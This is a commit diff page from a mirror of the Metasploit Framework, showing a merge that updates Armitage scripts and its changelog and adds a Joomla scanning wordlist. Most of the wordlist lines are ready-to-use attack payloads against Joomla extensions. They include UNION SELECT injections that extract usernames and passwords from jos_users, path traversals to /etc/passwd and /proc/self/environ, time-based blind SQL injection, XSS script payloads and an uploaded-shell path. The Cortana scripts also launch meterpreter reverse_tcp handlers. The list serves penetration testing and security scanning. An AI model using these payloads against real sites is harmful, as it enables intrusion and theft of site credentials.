infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master' into web-modules

Tasos Laskos 2013-01-29 01:06:26 +02:00
parent 9aaca2eae9 fc833ea8df
commit 76e0305dcf
79 changed files with 3412 additions and 529 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.travis.yml
View File

@ -6,3 +6,5 @@ rvm:
notifications:
irc: "irc.freenode.org#msfnotify"
git:
depth: 1

BIN
data/armitage/armitage.jar
View File

Binary file not shown.

BIN
data/armitage/cortana.jar
View File

Binary file not shown.

26
data/armitage/whatsnew.txt
View File

@ -1,6 +1,32 @@
Armitage Changelog
==================
23 Jan 13 (tested against msf 16351)
---------
- Added helpers to set EXE::Custom and EXE::Template options.
- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts
- Cleaned up Armitage -> SOCKS Proxy job management code. The code to
check if a proxy server is up was deadlock prone. Removed it.
- Starting SOCKS Proxy module now opens a tab displaying the module
start process. An event is posted to the event log too.
- Created an option helper to select credentials for SMBUser, SMBPass,
USERNAME, and PASSWORD.
- Added a feature to label hosts. A label will show up in its own column
in table view or below all info in graph view. Any team member may
change a label through [host] -> host -> Set Label. You may also use
dynamic workspaces to show hosts with certain labels attached.
- Fixed bad things happening when connecting Armitage to 'localhost' and
not '127.0.0.1'.
- Screenshots and Webcam shots are now centered in their tab.
- Added an alternate .bat file to start msfrpcd on Windows in the
Metasploit 4.5 installer's environment.
- Added a color-style for [!] warning messages
Cortana Updates (for scripters)
--------
- &handler function now works as advertised.
- Cortana now avoids use of core.setg
4 Jan 13 (tested against msf 16252)
--------
- Added a helper to set REXE option

627
data/wordlists/joomla.txt Executable file
View File

@ -0,0 +1,627 @@
&controller=../../../../../../../../../../../../[LFI]%00
?1.5.10-x
?1.5.11-x-http_ref
?1.5.11-x-php-s3lf
?1.5.3-path-disclose
?1.5.3-spam
?1.5.8-x
?1.5.9-x
?j1012-fixate-session
?option=com_mysms&Itemid=0&task=phonebook
Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png
admin/
administrator/
administrator/components/
administrator/components/com_a6mambocredits/
administrator/components/com_a6mambohelpdesk/
administrator/components/com_admin/admin.admin.html.php
administrator/components/com_astatspro/refer.php
administrator/components/com_bayesiannaivefilter/
administrator/components/com_chronocontact/excelwriter/PPS/File.php
administrator/components/com_colophon/
administrator/components/com_colorlab/
administrator/components/com_comprofiler/
administrator/components/com_comprofiler/plugin.class.php
administrator/components/com_cropimage/admin.cropcanvas.php
administrator/components/com_extplorer/
administrator/components/com_feederator/includes/tmsp/add_tmsp.php
administrator/components/com_googlebase/
administrator/components/com_installer
administrator/components/com_jcs/
administrator/components/com_jim/
administrator/components/com_jjgallery/
administrator/components/com_joom12pic/
administrator/components/com_joomla-visites/
administrator/components/com_joomla_flash_uploader/
administrator/components/com_joomlaflashfun/
administrator/components/com_joomlaradiov5/
administrator/components/com_jpack/
administrator/components/com_jreactions/
administrator/components/com_juser/
administrator/components/com_admin/
administrator/components/com_kochsuite /
administrator/components/com_linkdirectory/
administrator/components/com_livechat/getSavedChatRooms.php
administrator/components/com_livechat/xmlhttp.php
administrator/components/com_lurm_constructor/admin.lurm_constructor.php
administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
administrator/components/com_mambelfish/
administrator/components/com_mgm/
administrator/components/com_mmp/help.mmp.php
administrator/components/com_mosmedia/
administrator/components/com_multibanners/extadminmenus.class.php
administrator/components/com_panoramic/
administrator/components/com_peoplebook/param.peoplebook.php
administrator/components/com_phpshop/toolbar.phpshop.html.php
administrator/components/com_remository/admin.remository.php
administrator/components/com_serverstat/install.serverstat.php
administrator/components/com_simpleswfupload/uploadhandler.php");
administrator/components/com_swmenupro/
administrator/components/com_treeg/
administrator/components/com_uhp/
administrator/components/com_uhp2/
administrator/components/com_webring/
administrator/components/com_wmtgallery/
administrator/components/com_wmtportfolio/
administrator/components/com_x-shop/
administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
administrator/index.php?option=com_searchlog&act=log
ajaxim/
akocomments.php
cart?Itemid=[SQLi]
component/com__brightweblinks/
component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
component/osproperty/?task=agent_register
component/quran/index.php?option=com_quran&action=viewayat&surano=
components/com_ clickheat/
components/com_5starhotels/
components/com_Jambook/jambook.php
components/com_a6mambocredits/
components/com_a6mambohelpdesk/
components/com_ab_gallery/
components/com_acajoom/
components/com_acctexp/
components/com_aclassf/
components/com_activities/
components/com_actualite/
components/com_admin/admin.admin.html.php
components/com_advancedpoll/
components/com_agora/
components/com_agoragroup/
components/com_ajaxchat/
components/com_akobook/
components/com_akocomment/
components/com_akogallery
components/com_alberghi/
components/com_allhotels/
components/com_alphacontent/
components/com_altas/
components/com_amocourse/
components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
components/com_articles/
components/com_artist/
components/com_artlinks/
components/com_asortyment/
components/com_astatspro/
components/com_awesom/
components/com_babackup/
components/com_banners/
components/com_bayesiannaivefilter/
components/com_be_it_easypartner/
components/com_beamospetition/
components/com_biblestudy/
components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
components/com_blog/
components/com_bookflip/
components/com_bookjoomlas/
components/com_booklibrary/
components/com_books/
components/com_bsadv/
components/com_bsq_sitestats/
components/com_bsq_sitestats/external/rssfeed.php
components/com_bsqsitestats/
components/com_calendar/
components/com_camelcitydb2/
components/com_candle/
components/com_casino_blackjack/
components/com_casino_videopoker/
components/com_casinobase/
components/com_catalogproduction/
components/com_catalogshop/
components/com_category/
components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
components/com_chronocontact/excelwriter/PPS/File.php
components/com_cinema/
components/com_clasifier/
components/com_classifieds/
components/com_clickheat/
components/com_cloner/
components/com_cmimarketplace/
components/com_cms/
components/com_colophon/
components/com_colorlab/
components/com_competitions/
components/com_comprofiler/
components/com_comprofiler/plugin.class.php
components/com_contactinfo/
components/com_content/
components/com_cpg/cpg.php
components/com_cropimage/admin.cropcanvas.php
components/com_custompages/
components/com_cx/
components/com_d3000/
components/com_dadamail/
components/com_dailymessage/
components/com_datsogallery/
components/com_dbquery/
components/com_detail/
components/com_digistore/
components/com_directory/
components/com_djiceshoutbox/
components/com_doc/
components/com_downloads/
components/com_ds-syndicate/
components/com_dtregister/
components/com_dv/externals/phpupload/upload.php");
components/com_easybook/
components/com_emcomposer/
components/com_equotes/
components/com_estateagent/
components/com_eventing/
components/com_eventlist/
components/com_events/
components/com_ewriting/
components/com_expose/uploadimg.php
components/com_expshop/
components/com_extcalendar/
components/com_extcalendar/cal_popup.php?extmode=view&extid=
components/com_extcalendar/extcalendar.php
components/com_extended_registration/registration_detailed.inc.php
components/com_extplorer/
components/com_ezine/
components/com_ezstore/
components/com_facileforms/
components/com_fantasytournament/
components/com_faq/
components/com_feederator/includes/tmsp/add_tmsp.php
components/com_filebase/
components/com_filiale/
components/com_flashfun/
components/com_flashmagazinedeluxe/
components/com_flippingbook/
components/com_flyspray/startdown.php
components/com_fm/fm.install.php
components/com_foevpartners/
components/com_football/
components/com_formtool/
components/com_forum/
components/com_fq/
components/com_fundraiser/
components/com_galeria/
components/com_galleria/galleria.html.php
components/com_gallery/
components/com_game/
components/com_gameq/
components/com_garyscookbook/
components/com_genealogy/
components/com_geoboerse/
components/com_gigcal/
components/com_gmaps/
components/com_googlebase/
components/com_gsticketsystem/
components/com_guide/
components/com_hashcash/server.php
components/com_hbssearch/
components/com_hello_world/
components/com_hotproperties/
components/com_hotproperty/
components/com_hotspots/
components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
components/com_hwdvideoshare/
components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
components/com_ice/
components/com_idoblog/
components/com_idvnews/
components/com_ignitegallery/
components/com_ijoomla_archive/
components/com_ijoomla_rss/
components/com_inter/
components/com_ionfiles/
components/com_is/
components/com_ixxocart/
components/com_jabode/
components/com_jashowcase/
components/com_jb2/
components/com_jce/
components/com_jcs/
components/com_jd-wiki/
components/com_jd-wp/
components/com_jim/
components/com_jjgallery/
components/com_jmovies/
components/com_jobline/
components/com_jombib/
components/com_joobb/
components/com_jooget/
components/com_joom12pic/
components/com_joomla-visites/
components/com_joomla_flash_uploader/
components/com_joomlaboard/
components/com_joomladate/
components/com_joomlaflashfun/
components/com_joomlalib/
components/com_joomlaradiov5/
components/com_joomlavvz/
components/com_joomlaxplorer/
components/com_joomloads/
components/com_joomradio/
components/com_joomtracker/
components/com_joovideo/
components/com_jotloader/
components/com_journal/
components/com_jpack/
components/com_jpad/
components/com_jreactions/
components/com_jreviews/scripts/xajax.inc.php
components/com_jumi/
components/com_juser/
components/com_jvideo/
components/com_k2/
components/com_kbase/
components/com_knowledgebase/fckeditor/fckeditor.js
components/com_kochsuite /
components/com_kunena/
components/com_letterman/
components/com_lexikon/
components/com_linkdirectory/
components/com_listoffreeads/
components/com_livechat/getSavedChatRooms.php
components/com_livechat/xmlhttp.php
components/com_liveticker/
components/com_lm/
components/com_lmo/
components/com_loudmounth/includes/abbc/abbc.class.php
components/com_loudmouth/
components/com_lowcosthotels/
components/com_lurm_constructor/admin.lurm_constructor.php
components/com_mad4joomla/
components/com_madeira/img.php
components/com_maianmusic/
components/com_mailarchive/
components/com_mailto/
components/com_mambatstaff/mambatstaff.php
components/com_mambelfish/
components/com_mambospgm/
components/com_mambowiki/MamboLogin.php
components/com_marketplace/
components/com_mcquiz/
components/com_mdigg/
components/com_media_library/
components/com_mediaslide/
components/com_mezun/
components/com_mgm/
components/com_minibb/
components/com_misterestate/
components/com_mmp/help.mmp.php
components/com_model/
components/com_moodle/moodle.php
components/com_moofaq/
components/com_mosmedia/
components/com_mospray/scripts/admin.php
components/com_mosres/
components/com_most/
components/com_mp3_allopass/
components/com_mtree/
components/com_mtree/img/listings/o/{id}.php
components/com_multibanners/extadminmenus.class.php
components/com_myalbum/
components/com_mycontent/
components/com_mydyngallery/
components/com_mygallery/
components/com_n-forms/
components/com_na_content/
components/com_na_mydocs/
components/com_na_newsdescription/
components/com_na_qforms/
components/com_neogallery/
components/com_neorecruit/
components/com_neoreferences/
components/com_netinvoice/
components/com_news/
components/com_news_portal/
components/com_newsflash/
components/com_nfn_addressbook/
components/com_nicetalk/
components/com_noticias/
components/com_omnirealestate/
components/com_omphotogallery/
components/com_ongumatimesheet20/
components/com_onlineflashquiz/
components/com_ownbiblio/
components/com_panoramic/
components/com_paxgallery/
components/com_paxxgallery/
components/com_pcchess/
components/com_pcchess/include.pcchess.php
components/com_pccookbook/
components/com_pccookbook/pccookbook.php
components/com_peoplebook/param.peoplebook.php
components/com_performs/
components/com_philaform/
components/com_phocadocumentation/
components/com_php/
components/com_phpshop/toolbar.phpshop.html.php
components/com_pinboard/
components/com_pms/
components/com_poll/
components/com_pollxt/
components/com_ponygallery/
components/com_portafolio/
components/com_portfol/
components/com_prayercenter/
components/com_pro_desk/
components/com_prod/
components/com_productshowcase/
components/com_profiler/
components/com_projectfork/
components/com_propertylab/
components/com_puarcade/
components/com_publication/
components/com_quiz/
components/com_rapidrecipe/
components/com_rdautos/
components/com_realestatemanager/
components/com_recly/
components/com_referenzen/
components/com_rekry/
components/com_remository/admin.remository.php
components/com_remository_files/file_image_14/1276100016shell.php
components/com_reporter/processor/reporter.sql.php
components/com_resman/
components/com_restaurante/
components/com_ricette/
components/com_rsfiles/
components/com_rsgallery/
components/com_rsgallery2/
components/com_rss/
components/com_rssreader/
components/com_rssxt/
components/com_rwcards/
components/com_school/
components/com_search/
components/com_sebercart/getPic.php?p=[LFD]%00
components/com_securityimages/
components/com_sef/
components/com_seminar/
components/com_serverstat/install.serverstat.php
components/com_sg/
components/com_simple_review/
components/com_simpleboard/
components/com_simplefaq/
components/com_simpleshop/
components/com_sitemap/sitemap.xml.php
components/com_slideshow/
components/com_smf/
components/com_smf/smf.php
components/com_swmenupro/
components/com_team/
components/com_tech_article/
components/com_thopper/
components/com_thyme/
components/com_tickets/
components/com_tophotelmodule/
components/com_tour_toto/
components/com_trade/
components/com_uhp/
components/com_uhp2/
components/com_user/controller.php
components/com_users/
components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
components/com_vehiclemanager/
components/com_versioning /
components/com_videodb/core/videodb.class.xml.php
components/com_virtuemart/
components/com_volunteer/
components/com_vr/
components/com_waticketsystem/
components/com_webhosting/
components/com_weblinks/
components/com_webring/
components/com_wmtgallery/
components/com_wmtportfolio/
components/com_x-shop/
components/com_xevidmegahd/
components/com_xewebtv/
components/com_xfaq/
components/com_xgallery/helpers/img.php?file=
components/com_xsstream-dm/
components/com_ynews/
components/com_yvcomment/
components/com_zoom/classes/
components/mod_letterman/
components/remository/
eXtplorer/
easyblog/entry/uncategorized
extplorer/
components/com_mtree/img/listings/o/{id}.php where {id}
includes/joomla.php
index.php/404'
index.php/?option=com_question&catID=21' and+1=0 union all
index.php/image-gallery/"><script>alert('xss')</script>/25-koala
index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&amp;type=css&v=1
index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
index.php?option=com_aardvertiser&cat_name=conf&task=<=
index.php?option=com_aardvertiser&task=
index.php?option=com_abc&view=abc&letter=AS&sectionid='
index.php?option=com_advert&id=36'
index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
index.php?option=com_alfurqan15x&action=viewayat&surano=
index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
index.php?option=com_annonces&view=edit&Itemid=1
index.php?option=com_articleman&task=new
index.php?option=com_bbs&bid=-1
index.php?option=com_beamospetition&startpage=3&pet=-
index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users-
index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1
index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
index.php?option=com_chronoconnectivity&itemid=1
index.php?option=com_chronocontact&itemid=1
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=
index.php?option=com_clantools&squad=1+
index.php?option=com_clantools&task=clanwar&showgame=1+
index.php?option=com_commedia&format=raw&task=image&pid=4&id=964'
index.php?option=com_commedia&task=page&commpid=21
index.php?option=com_connect&view=connect&controller=
index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_dioneformwizard&controller=[LFI]%00
index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1
index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12
index.php?option=com_easyfaq&Itemid=1&task=view&gid=
index.php?option=com_easyfaq&catid=1&task=view&id=-2527+
index.php?option=com_easyfaq&task=view&contact_id=
index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=
index.php?option=com_equipment&task=components&id=45&sec_men_id=
index.php?option=com_equipment&view=details&id=
index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
index.php?option=com_etree&view=displays&layout=category&id=[SQL]
index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]
index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
index.php?option=com_filecabinet&task=download&cid[]=7
index.php?option=com_firmy&task=section_show_set&Id=-1
index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=
index.php?option=com_graphics&controller=
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=
index.php?option=com_huruhelpdesk&view=detail
index.php?option=com_huruhelpdesk&view=detail&cid[0]=
index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
index.php?option=com_iproperty&view=agentproperties&id=
index.php?option=com_jacomment&view=
index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_jcommunity&controller=members&task=1'
index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
index.php?option=com_jfuploader&Itemid=
index.php?option=com_jgen&task=view&id=
index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
index.php?option=com_jimtawl&Itemid=12&task=
index.php?option=com_jmarket&controller=product&task=1'
index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1'
index.php?option=com_jomdirectory&task=search&type=111+
index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
index.php?option=com_joomla_flash_uploader&Itemid=1
index.php?option=com_joomleague&func=showNextMatch&p=[sqli]
index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
index.php?option=com_joomtouch&controller=
index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
index.php?option=com_jstore&controller=product-display&task=1'
index.php?option=com_jsubscription&controller=subscription&task=1'
index.php?option=com_jtickets&controller=ticket&task=1'
index.php?option=com_konsultasi&act=detail&sid=
index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
index.php?option=com_kunena&func=userlist&search=
index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
index.php?option=com_matamko&controller=
index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm
index.php?option=com_neorecruit&task=offer_view&id=
index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
index.php?option=com_noticeboard&controller=
index.php?option=com_obsuggest&controller=
index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
index.php?option=com_oziogallery&Itemid=
index.php?option=com_page&id=53
index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]
index.php?option=com_phocagallery&view=categories&Itemid=
index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_php&file=../../../../../../../../../../etc/passwd
index.php?option=com_php&file=../images/phplogo.jpg
index.php?option=com_php&file=../js/ie_pngfix.js
index.php?option=com_ponygallery&Itemid=[sqli]
index.php?option=com_products&catid=-1
index.php?option=com_products&id=-1
index.php?option=com_products&product_id=-1
index.php?option=com_products&task=category&catid=-1
index.php?option=com_properties&task=agentlisting&aid=
index.php?option=com_qcontacts&Itemid=1'
index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_restaurantguide&view=country&id='&Itemid=69
index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
index.php?option=com_seyret&view=
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
index.php?option=com_smartsite&controller=
index.php?option=com_spa&view=spa_product&cid=
index.php?option=com_spidercalendar
index.php?option=com_spidercalendar&date=1'
index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_staticxt&staticfile=test.php&id=1923
index.php?option=com_szallasok&mode=8&id=25 (SQL)
index.php?option=com_tag&task=tag&tag=
index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
index.php?option=com_ultimateportfolio&controller=
index.php?option=com_users&view=registration
index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_x-shop&action=artdetail&idd='
index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
index.php?option=com_xcomp&controller=../../[LFI]%00
index.php?option=com_xvs&controller=../../[LFI]%00
index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
index.php?option=com_yjcontactus&view=
index.php?option=com_youtube&id_cate=4
index.php?option=com_zina&view=zina&Itemid=9
index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
index.php?search=NoGe&option=com_esearch&searchId=
index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
js/index.php?option=com_socialads&view=showad&Itemid=94
libraries/joomla/utilities/compat/php50x.php
libraries/pcl/pcltar.php
libraries/phpmailer/phpmailer.php
libraries/phpxmlrpc/xmlrpcs.php
modules/mod_artuploader/upload.php");
modules/mod_as_category.php
modules/mod_calendar.php
modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
modules/mod_jfancy/script.php");
modules/mod_ppc_simple_spotlight/elements/upload_file.php
modules/mod_ppc_simple_spotlight/img/
modules/mod_pxt/
modules/mod_quick_question.php
modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
patch/makedown.php?arquivo=../../../../etc/passwd
plugins/content/efup_files/helper.php");
plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
plugins/editors/xstandard/attachmentlibrary.php
print.php?task=person&id=36 and 1=1
templates/be2004-2/
templates/ja_purity/
wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'

2
external/source/armitage/build.xml vendored
View File

@ -16,6 +16,8 @@
depend="yes"
debug="true"
optimize="yes"
target="1.6"
source="1.6"
includeantruntime="fuckno"
>
<classpath path="./lib/jgraphx.jar;./lib/sleep.jar;./lib/msgpack-0.5.1-devel.jar;./lib/postgresql-9.1-901.jdbc4.jar" />

2
external/source/armitage/resources/about.html vendored
View File

@ -3,7 +3,7 @@
<center><h1>Armitage 1.45</h1></center>
<p>An attack management tool for Metasploit&reg;
<br />Release: 4 Jan 13</p>
<br />Release: 23 Jan 13</p>
<br />
<p>Developed by:</p>

1
external/source/armitage/resources/msfconsole.style vendored
View File

@ -4,6 +4,7 @@
^msf (.*?)\((.*?)\) > \umsf\u $1(\c4$2\o) >
^\[\*\] (.*) \cC[*]\o $1
^\[\+\] (.*) \c9[+]\o $1
^\[\!\] (.*) \c8[!]\o $1
^\[\-\] (.*) \c4[-]\o $1
^ =\[ (.*) =[\c7 $1
^(=[=\s]+) \cE$1

12
external/source/armitage/resources/msfrpcd_new.bat vendored Normal file
View File

@ -0,0 +1,12 @@
@echo off
set BASE=$$BASE$$..\..\
cd "%BASE%"
set PATH=%BASE%ruby\bin;%BASE%java\bin;%BASE%tools;%BASE%nmap;%BASE%postgresql\bin;%PATH%
IF NOT EXIST "%BASE%java" GOTO NO_JAVA
set JAVA_HOME="%BASE%java"
:NO_JAVA
set MSF_DATABASE_CONFIG="%BASE%apps\pro\ui\config\database.yml"
set MSF_BUNDLE_GEMS=0
set BUNDLE_GEMFILE=%BASE%apps\pro\ui\Gemfile
cd "%BASE%apps\pro\msf3"
rubyw msfrpcd -a 127.0.0.1 -U $$USER$$ -P $$PASS$$ -S -f -p $$PORT$$

27
external/source/armitage/scripts-cortana/cortanadb.sl vendored
View File

@ -42,8 +42,13 @@ sub c_client {
sub setupHandlers {
find_job("Exploit: multi/handler", {
if ($1 == -1) {
# set LPORT for the user...
local('$c');
$c = call($client, "console.allocate")['id'];
call($client, "console.write", $c, "setg LPORT " . randomPort() . "\n");
call($client, "console.release", $c);
# setup a handler for meterpreter
call($client, "core.setg", "LPORT", randomPort());
call($client, "module.execute", "exploit", "multi/handler", %(
PAYLOAD => "windows/meterpreter/reverse_tcp",
LHOST => "0.0.0.0",
@ -55,7 +60,7 @@ sub setupHandlers {
sub main {
global('$client $mclient');
local('%r $exception');
local('%r $exception $lhost $temp $c');
setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L);
@ -81,8 +86,24 @@ sub main {
# setup second thread.
%r = call($client, "armitage.validate", $user, $pass, $null, "armitage", 120326);
# resolve lhost..
$c = call($client, "console.allocate")['id'];
call($client, "console.write", $c, "setg LHOST\n");
while ($lhost eq "") {
$temp = call($client, "console.read", $c)['data'];
if (["$temp" startsWith: "LHOST => "]) {
$lhost = substr(["$temp" trim], 9);
}
else {
# this shouldn't happen because having LHOST set is a precondition
# for Cortana to connect to a team server.
sleep(1000);
}
}
call($client, "console.release", $c);
# pass some objects back yo.
[$loader passObjects: $client, $mclient];
[$loader passObjects: $client, $mclient, $lhost];
# don't make previous messages available...
call($mclient, "armitage.skip");

21
external/source/armitage/scripts-cortana/internal.sl vendored
View File

@ -9,7 +9,7 @@ import msf.*;
# setg("varname", "value")
sub setg {
call_async("core.setg", $1, $2);
cmd_safe("setg $1 $2");
}
sub readg {
@ -335,14 +335,22 @@ sub multi_handler {
}
sub handler {
local('%o $3');
local('%o $3 $key $value');
# default options
%o['PAYLOAD'] = $1;
%o['LPORT'] = $2;
%o['DisablePayloadHandler'] = 'false';
%o['ExitOnSession'] = 'false';
# let the user override anything
if ($3) {
%o = copy($3);
foreach $key => $value ($3) {
%o[$key] = $value;
}
}
%o['PAYLOAD'] = "payload/ $+ $1";
%o['LPORT'] = $2;
# make sure LHOST is correct
if ('LHOST' !in %o) {
if ("*http*" iswm $1) {
%o['LHOST'] = lhost();
@ -352,6 +360,7 @@ sub handler {
}
}
# let's do it...
return launch('exploit', 'multi/handler', %o);
}

10
external/source/armitage/scripts/armitage.sl vendored
View File

@ -59,7 +59,7 @@ sub showHost {
else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) {
push(@overlay, 'resources/windowsxp.png');
}
else if ("*8*" iswm $match) {
else if ("*8*" iswm $match && "*2008*" !iswm $match) {
push(@overlay, 'resources/windows8.png');
}
else {
@ -139,7 +139,7 @@ sub _connectToMetasploit {
$progress = [new ProgressMonitor: $null, "Connecting to $1 $+ : $+ $2", "first try... wish me luck.", 0, 100];
